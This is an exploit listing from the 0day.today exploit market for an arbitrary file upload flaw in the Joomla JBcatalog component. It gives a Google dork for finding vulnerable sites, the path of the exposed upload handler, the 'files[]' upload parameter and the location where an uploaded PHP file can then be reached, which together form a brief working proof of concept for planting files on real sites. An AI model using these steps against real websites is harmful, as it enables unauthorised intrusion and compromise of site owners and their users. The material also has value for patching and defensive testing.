[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla JBcatalog Component - Arbitrary File Upload Vulnerability

Author
AlHikam0x
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-29239
Category
web applications
Date add
17-12-2017
Platform
php
# Exploit Title: Joomla Component JBcatalog - Arbitrary File Upload
# Google Dork: inurl:/components/com_jbcatalog/
# Date: 16 December 2017 (Indonesia)
# Exploit Author: AlHikam0x
# Tested on: Ubuntu

Proof of Concept

1. Check Vulnerability.
https://web-target/[path]/components/com_jbcatalog/libraries/jsupload/server/php/

View image : https://3.bp.blogspot.com/-6zLFQMaKCZg/WjU2Aqup4iI/AAAAAAAAABY/5qOv91kTdYkC-nhyZYtBwqcPtVtWitJGwCEwYBhgL/s1600/Screenshot%2Bfrom%2B2017-12-16%2B21-53-38.png

2. Array type Upload : files[]
3. Check file uploaded.
https://web-target/com_jbcatalog/libraries/jsupload/server/php/files/file.php

#  0day.today [2024-11-16]  #